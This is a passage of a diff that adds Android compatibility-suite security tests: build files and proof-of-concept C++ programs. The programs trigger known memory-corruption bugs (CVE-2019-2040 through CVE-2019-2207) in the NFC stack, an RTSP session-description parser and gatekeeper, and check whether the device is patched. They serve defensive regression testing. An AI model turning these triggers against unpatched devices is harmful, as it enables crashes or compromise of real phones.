+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include <rw_int.h>
+#include <nfc_int.h>
+
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+tNFC_STATUS rw_i93_select(uint8_t* p_uid);
+
+void GKI_freebuf(void*) {
+}
+
+void GKI_start_timer(uint8_t, int32_t, bool) {
+}
+
+void GKI_stop_timer(uint8_t) {
+}
+
+int main() {
+ tRW_I93_CB* p_i93 = &rw_cb.tcb.i93;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t p_uid = 1;
+ if (rw_i93_select(&p_uid) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+
+ tNFC_CONN *p_data = (tNFC_CONN *) malloc(sizeof(tNFC_CONN));
+ if (!p_data) {
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.p_data = (NFC_HDR *) malloc(sizeof(uint8_t) * 32);
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+
+ NFC_HDR *p_resp = (NFC_HDR*) p_data->data.p_data;
+ p_resp->len = 0;
+ p_resp->offset = 0;
+
+ p_i93->state = RW_I93_STATE_UPDATE_NDEF;
+ p_i93->sub_state = RW_I93_SUBSTATE_RESET_LEN;
+ p_i93->block_size = 2 * (I93_MAX_BLOCK_LENGH + 1);
+ p_i93->ndef_tlv_start_offset = 2 * (I93_MAX_BLOCK_LENGH) - 1;
+ p_data->status = NFC_STATUS_OK;
+
+ p_cb->p_cback(0, event, p_data);
+ free(p_data->data.p_data);
+ free(p_data);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/Android.bp
new file mode 100644
index 0000000..0024ef8
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/Android.bp
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2019-2040",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/include",
+ "system/nfc/src/gki/common",
+ "system/nfc/src/nfc/include",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/poc.cpp
new file mode 100644
index 0000000..b5eed24
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2040/poc.cpp
@@ -0,0 +1,75 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <nfc_api.h>
+#include <nfc_int.h>
+#include <rw_int.h>
+
+constexpr int kLength = 8;
+
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+
+tNFC_STATUS rw_i93_select(uint8_t *p_uid);
+
+void GKI_start_timer(uint8_t, int32_t, bool) {}
+
+void GKI_stop_timer(uint8_t) {}
+
+void GKI_freebuf(void *p_buf __attribute__((unused))) {}
+
+int main() {
+ tRW_I93_CB *p_i93 = &rw_cb.tcb.i93;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t p_uid = 1;
+ if (rw_i93_select(&p_uid) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+
+ tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN));
+ if (!p_data) {
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.p_data = (NFC_HDR *)malloc(sizeof(uint8_t) * 16);
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+
+ p_i93->state = RW_I93_STATE_BUSY;
+ p_i93->sub_state = RW_I93_SUBSTATE_CHECK_READ_ONLY;
+ p_i93->block_size = I93_MAX_BLOCK_LENGH - 1;
+ p_i93->sent_cmd = I93_CMD_EXT_GET_SYS_INFO;
+ p_data->status = NFC_STATUS_OK;
+
+ NFC_HDR *p_resp = (NFC_HDR *)p_data->data.p_data;
+ p_resp->len = kLength;
+ p_resp->offset = 0;
+
+ p_cb->p_cback(0, event, p_data);
+ free(p_data->data.p_data);
+ free(p_data);
+
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/Android.bp
new file mode 100644
index 0000000..3638d08
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/Android.bp
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2019-2044",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "32",
+ include_dirs: [
+ "frameworks/av/media/libstagefright/rtsp/",
+ ],
+ shared_libs: [
+ "libmediaplayerservice",
+ "libstagefright_foundation",
+ "libutils",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/poc.cpp
new file mode 100644
index 0000000..e733c6f
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2044/poc.cpp
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <stdlib.h>
+#include <APacketSource.h>
+#include <ASessionDescription.h>
+
+using namespace android;
+
+int main(void) {
+ sp<ASessionDescription> desc = new ASessionDescription;
+ static const char *raw =
+ "m=mFormats 20\r\n"
+ "a=rtpmap:20 MP4V-ES/1/2\r\n"
+ "a=fmtp:20 config=0000012000004000280020008061616161616161616161616161"
+ "61616161616161616161616161616161616161616161616161616161616161616161"
+ "61616161616161616161616161616161616161616161616161616161616161616161"
+ "616161616161616161616161616161616161616161616161616161\r\n"
+ "a=range:npt=1.1-2.2\r\n"
+ "a=framesize:1-9 \r\n"
+ "a=control:abc\r\n"
+ "a=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n";
+
+ if(!desc->setTo(raw, strlen(raw))) {
+ return EXIT_FAILURE;
+ }
+
+ sp<APacketSource> source = new APacketSource(desc, 1);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/Android.bp
new file mode 100644
index 0000000..b818889
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2019-2099",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfa/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/poc.cpp
new file mode 100644
index 0000000..8cfa619
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/poc.cpp
@@ -0,0 +1,122 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <dlfcn.h>
+#include <nfa_rw_int.h>
+#include <nfc_int.h>
+#include <rw_int.h>
+#include <stdlib.h>
+#include "../includes/common.h"
+
+#define LENGTH 0xBEB
+
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+void NFA_Init(tHAL_NFC_ENTRY *p_hal_entry_tbl);
+bool nfa_rw_activate_ntf(tNFA_RW_MSG *p_data);
+
+bool isInitialized = false;
+
+static void *(*real_memcpy)(void *to, const void *from, size_t numBytes) = nullptr;
+
+void init(void) {
+ real_memcpy = (void *(*)(void *, const void *, size_t))dlsym(RTLD_NEXT, "memcpy");
+ if (real_memcpy == nullptr) {
+ return;
+ }
+ isInitialized = true;
+}
+
+void *memcpy(void *to, const void *from, size_t numBytes) {
+ if (!isInitialized) {
+ init();
+ }
+ if (numBytes == LENGTH) {
+ exit(EXIT_VULNERABLE);
+ }
+ return real_memcpy(to, from, numBytes);
+}
+
+int freeResourcesAndReturn(int status, tNFA_RW_MSG *ptr1 = nullptr,
+ tNFC_ACTIVATE_DEVT *ptr2 = nullptr, tRW_DATA *ptr3 = nullptr,
+ NFC_HDR *ptr4 = nullptr, uint8_t *ptr5 = nullptr) {
+ if (ptr1) {
+ if (ptr2) {
+ free(ptr2);
+ }
+ free(ptr1);
+ }
+ if (ptr3) {
+ if (ptr4) {
+ free(ptr4);
+ }
+ free(ptr3);
+ }
+ if (ptr5) {
+ free(ptr5);
+ }
+ return status;
+}
+
+int main() {
+ GKI_init();
+ rw_init();
+ tHAL_NFC_ENTRY p_hal_entry_tbl;
+ NFA_Init(&p_hal_entry_tbl);
+
+ tNFA_RW_MSG *p_data = (tNFA_RW_MSG *)malloc(sizeof(tNFA_RW_MSG));
+ if (!p_data) {
+ return EXIT_FAILURE;
+ }
+ p_data->activate_ntf.p_activate_params =
+ (tNFC_ACTIVATE_DEVT *)malloc(sizeof(tNFC_ACTIVATE_DEVT));
+ if (!(p_data->activate_ntf.p_activate_params)) {
+ return freeResourcesAndReturn(EXIT_FAILURE, p_data);
+ }
+
+ tNFC_ACTIVATE_DEVT *p_activate_params = p_data->activate_ntf.p_activate_params;
+ p_activate_params->protocol = NFC_PROTOCOL_T2T;
+
+ nfa_rw_activate_ntf(p_data);
+
+ tRW_CBACK *p_cback = rw_cb.p_cback;
+ tRW_DATA *p_rw_data = (tRW_DATA *)malloc(sizeof(tRW_DATA));
+ if (!p_rw_data) {
+ return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params);
+ }
+
+ nfa_rw_cb.cur_op = NFA_RW_OP_READ_NDEF;
+ p_rw_data->data.p_data = (NFC_HDR *)malloc(sizeof(NFC_HDR));
+ if (!(p_rw_data->data.p_data)) {
+ return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params,
+ p_rw_data);
+ }
+
+ nfa_rw_cb.p_ndef_buf = (uint8_t *)malloc(sizeof(uint8_t));
+ if (!(nfa_rw_cb.p_ndef_buf)) {
+ return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params,
+ p_rw_data, p_rw_data->data.p_data);
+ }
+
+ p_rw_data->data.p_data->len = LENGTH;
+ if (p_cback) {
+ p_cback(RW_T3T_CHECK_EVT, p_rw_data);
+ }
+
+ return freeResourcesAndReturn(EXIT_SUCCESS, p_data, p_data->activate_ntf.p_activate_params,
+ p_rw_data, p_rw_data->data.p_data, nfa_rw_cb.p_ndef_buf);
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/Android.bp
new file mode 100644
index 0000000..e0a3f81
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/Android.bp
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2019-2115",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ include_dirs: [
+ "system/gatekeeper/include/gatekeeper/",
+ ],
+ shared_libs: [
+ "libgatekeeper",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/poc.cpp
new file mode 100644
index 0000000..9ddc0e1
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/poc.cpp
@@ -0,0 +1,106 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define private public
+
+#include "../includes/common.h"
+#include "gatekeeper.h"
+
+using namespace gatekeeper;
+
+bool isVulnerable = false;
+const uint8_t *authTokenKey = nullptr;
+
+void *operator new(decltype(sizeof(0)) n) noexcept(false) { return malloc(n); }
+
+void operator delete(void *ptr) throw() {
+ if (ptr == authTokenKey) {
+ isVulnerable = true;
+ }
+ if (!ptr) {
+ free(ptr);
+ }
+}
+
+class DerivedGateKeeper : public GateKeeper {
+ protected:
+ bool GetAuthTokenKey(const uint8_t **auth_token_key,
+ uint32_t *length __attribute__((unused))) const {
+ *auth_token_key = (const uint8_t *)(new uint8_t());
+ authTokenKey = *auth_token_key;
+ return true;
+ }
+ void GetPasswordKey(const uint8_t **password_key __attribute__((unused)),
+ uint32_t *length __attribute__((unused))) {}
+ void ComputePasswordSignature(uint8_t *signature __attribute__((unused)),
+ uint32_t signature_length __attribute__((unused)),
+ const uint8_t *key __attribute__((unused)),
+ uint32_t key_length __attribute__((unused)),
+ const uint8_t *password __attribute__((unused)),
+ uint32_t password_length __attribute__((unused)),
+ salt_t salt __attribute__((unused))) const {}
+ void GetRandom(void *random __attribute__((unused)),
+ uint32_t requested_size __attribute__((unused))) const {}
+ void ComputeSignature(uint8_t *signature __attribute__((unused)),
+ uint32_t signature_length __attribute__((unused)),
+ const uint8_t *key __attribute__((unused)),
+ uint32_t key_length __attribute__((unused)),
+ const uint8_t *message __attribute__((unused)),
+ const uint32_t length __attribute__((unused))) const {}
+ uint64_t GetMillisecondsSinceBoot() const { return EXIT_SUCCESS; }
+ bool GetFailureRecord(uint32_t uid __attribute__((unused)),
+ secure_id_t user_id __attribute__((unused)),
+ failure_record_t *record __attribute__((unused)),
+ bool secure __attribute__((unused))) {
+ return false;
+ }
+ bool ClearFailureRecord(uint32_t uid __attribute__((unused)),
+ secure_id_t user_id __attribute__((unused)),
+ bool secure __attribute__((unused))) {
+ return false;
+ }
+ bool WriteFailureRecord(uint32_t uid __attribute__((unused)),
+ failure_record_t *record __attribute__((unused)),
+ bool secure __attribute__((unused))) {
+ return false;
+ }
+ uint32_t ComputeRetryTimeout(const failure_record_t *record __attribute__((unused))) {
+ return EXIT_SUCCESS;
+ }
+ virtual bool IsHardwareBacked() const { return false; }
+ bool DoVerify(const password_handle_t *expected_handle __attribute__((unused)),
+ const SizedBuffer &password __attribute__((unused))) {
+ return false;
+ }
+};
+
+int main() {
+ uint8_t *auth_token = new uint8_t();
+ uint32_t length = sizeof(uint32_t);
+ SizedBuffer *sb = new SizedBuffer(auth_token, length);
+ uint64_t timestamp = 1;
+ secure_id_t user_id = 1;
+ secure_id_t authenticator_id = 1;
+ uint64_t challenge = 0;
+
+ DerivedGateKeeper *object = new DerivedGateKeeper();
+ object->MintAuthToken(sb, timestamp, user_id, authenticator_id, challenge);
+
+ delete auth_token;
+ delete object;
+ delete sb;
+ return (isVulnerable) ? EXIT_VULNERABLE : EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2133/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2133/Android.bp
index 5d006c3..35d651e 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2133/Android.bp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2133/Android.bp
@@ -26,9 +26,6 @@
"poc.cpp",
],
multilib: {
- lib32: {
- suffix: "32",
- },
lib64: {
include_dirs: [
"packages/apps/Nfc/nci/jni/extns/pn54x/src/mifare/",
@@ -43,7 +40,6 @@
shared_libs: [
"libnfc_nci_jni",
],
- suffix: "64",
},
},
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2134/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2134/Android.bp
index 763772f..13ab145 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2134/Android.bp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2134/Android.bp
@@ -26,9 +26,6 @@
"poc.cpp",
],
multilib: {
- lib32: {
- suffix: "32",
- },
lib64: {
include_dirs: [
"packages/apps/Nfc/nci/jni/extns/pn54x/src/mifare/",
@@ -43,7 +40,6 @@
shared_libs: [
"libnfc_nci_jni",
],
- suffix: "64",
},
},
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/Android.bp
new file mode 100644
index 0000000..b55107a
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/Android.bp
@@ -0,0 +1,44 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE_2019_2135",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/nfa/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/ulinux/",
+ "packages/apps/Nfc/nci/jni/extns/pn54x/src/common/",
+ "packages/apps/Nfc/nci/jni/extns/pn54x/inc/",
+ ],
+ shared_libs: [
+ "libnfc_nci_jni",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/poc.cpp
new file mode 100644
index 0000000..582ddb8
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/poc.cpp
@@ -0,0 +1,40 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <nfa_api.h>
+#include <nfc_api.h>
+#include <phNfcTypes.h>
+#include <phNxpExtns.h>
+
+static void nfaMockDMCallback(uint8_t, tNFA_DM_CBACK_DATA *) {}
+static void nfaMockCCallback(uint8_t, tNFA_CONN_EVT_DATA *) {}
+
+int main(void) {
+ if (EXTNS_Init(nfaMockDMCallback, nfaMockCCallback) != NFCSTATUS_SUCCESS) {
+ return EXIT_FAILURE;
+ }
+ const int32_t size = 16;
+ const int32_t offset = size - 1;
+ uint8_t *p_data = static_cast<uint8_t *>(malloc(size));
+ if (p_data == nullptr) {
+ return EXIT_FAILURE;
+ }
+ p_data[offset] = 0x60;
+ EXTNS_MfcTransceive(&p_data[offset], 1);
+ free(p_data);
+ EXTNS_Close();
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/Android.bp
new file mode 100644
index 0000000..7fea2a5
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/Android.bp
@@ -0,0 +1,46 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2019-2206",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfa/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ "libchrome",
+ "libbase",
+ "liblog",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ]
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/poc.cpp
new file mode 100644
index 0000000..9d5d712
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/poc.cpp
@@ -0,0 +1,86 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <nfc_api.h>
+#include <nfc_int.h>
+#include <rw_int.h>
+#include <stdlib.h>
+#include <tags_defs.h>
+
+#define RWLENGTH 32
+#define PLENGTH 1
+#define OFFSET 7
+
+// borrowed from rw_i93.cc
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+tNFC_STATUS rw_i93_select(uint8_t *p_uid);
+
+void GKI_freebuf(void *p_buf __attribute__((unused))) {}
+
+void GKI_start_timer(uint8_t, int32_t, bool) {}
+
+void GKI_stop_timer(uint8_t) {}
+
+int main() {
+ tRW_I93_CB *p_i93 = &rw_cb.tcb.i93;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t p_uid = 1;
+ if (rw_i93_select(&p_uid) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+
+ tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN));
+
+ if (!p_data) {
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.p_data =
+ (NFC_HDR *)malloc(sizeof(uint8_t) * (OFFSET + PLENGTH) * 2);
+
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+
+ p_i93->state = RW_I93_STATE_SET_READ_ONLY;
+ p_i93->sub_state = RW_I93_SUBSTATE_WAIT_CC;
+ p_i93->block_size = 1;
+
+ p_i93->ndef_tlv_start_offset = 0;
+ p_i93->rw_length = RWLENGTH;
+ p_i93->ndef_length = p_i93->rw_length * 2;
+
+ p_data->status = NFC_STATUS_OK;
+ NFC_HDR *p_resp = (NFC_HDR *)p_data->data.p_data;
+ p_resp->len = PLENGTH;
+ p_resp->offset = OFFSET;
+
+ p_cb->p_cback(0, event, p_data);
+
+ free(p_data->data.p_data);
+ free(p_data);
+
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/Android.bp
new file mode 100644
index 0000000..439543b
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/Android.bp
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
